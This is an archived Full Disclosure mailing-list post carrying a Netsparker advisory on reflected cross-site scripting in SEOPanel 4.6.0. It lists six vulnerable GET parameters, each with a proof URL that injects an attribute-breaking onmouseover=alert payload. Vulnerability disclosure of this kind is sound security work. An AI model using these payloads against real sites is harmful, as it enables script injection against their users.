lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 28 Dec 2020 15:19:54 +0100
From: Daniel Bishtawi via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org, vuln@...unia.com, bugs@...uritytracker.com, 
 submissions@...ketstormsecurity.org
Subject: [FD] Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0

Hello,

We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel
4.6.0.

Information
--------------------

Advisory by Netsparker
Name: Cross-Site Scripting Vulnerabilities in SEOPanel
Affected Software: SEOPanel
Affected Versions: 4.6.0
Vendor Homepage: https://www.seopanel.org/
Vulnerability Type: Cross-Site Scripting
Severity: Important
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-20-005

Technical Details
--------------------

SEO Panel root was at http://localhost:8080

Cross-site Scripting in Directories.php

URL:
http://localhost:8080/directories.php?capcheck=%27%22%20ns%3dnetsparker(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1
Parameter Name: capcheck
Parameter Type: GET
Attack:   '" ns=netsparker(0x00E4E5)
Proof URL:
http://localhost:8080/directories.php?capcheck=%27%22%20onmouseover%3dalert(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1

Cross-site Scripting in seo-plugins-manager.php (5)

URL:
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x01434E)%20
Parameter Name: stscheck
Parameter Type: GET
Attack:   '" ns=netsparker(0x01434E)
Proof URL:
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x01434E)%20

URL:
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x00E492)%20
Parameter Name: stscheck
Parameter Type: GET
Attack:   ''" ns=netsparker(0x00E492)
Proof URL:
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x00E492)%20

URL:
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x011A0C)%20&pid=1&sec=listinfo
Parameter Name: pageno
Parameter Type: GET
Attack:   ''" ns=netsparker(0x011A0C)
Proof URL:
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x011A0C)%20&pid=1&sec=listinfo

URL:
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20ns%3dnetsparker(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select
Parameter Name: pageno
Parameter Type: GET
Attack:   '" ns=netsparker(0x01B8AB)
Proof URL:
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20onmouseover%3dalert(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select

URL:
http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x00DC5E)%20&pid=1&sec=listinfo
Parameter Name: pageno
Parameter Type: GET
Attack:   ''" ns=netsparker(0x00DC5E)
Proof URL:
http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x00DC5E)%20&pid=1&sec=listinfo

For more information:
https://www.netsparker.com/web-applications-advisories/ns-20-005-cross-site-scripting-in-seopanel/

Regards,

[image: upload image]
Daniel Bishtawi | Marketing Administrator
E: daniel.bishtawi@...sparker.com <daniel.bishtawi@...sparker.com>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists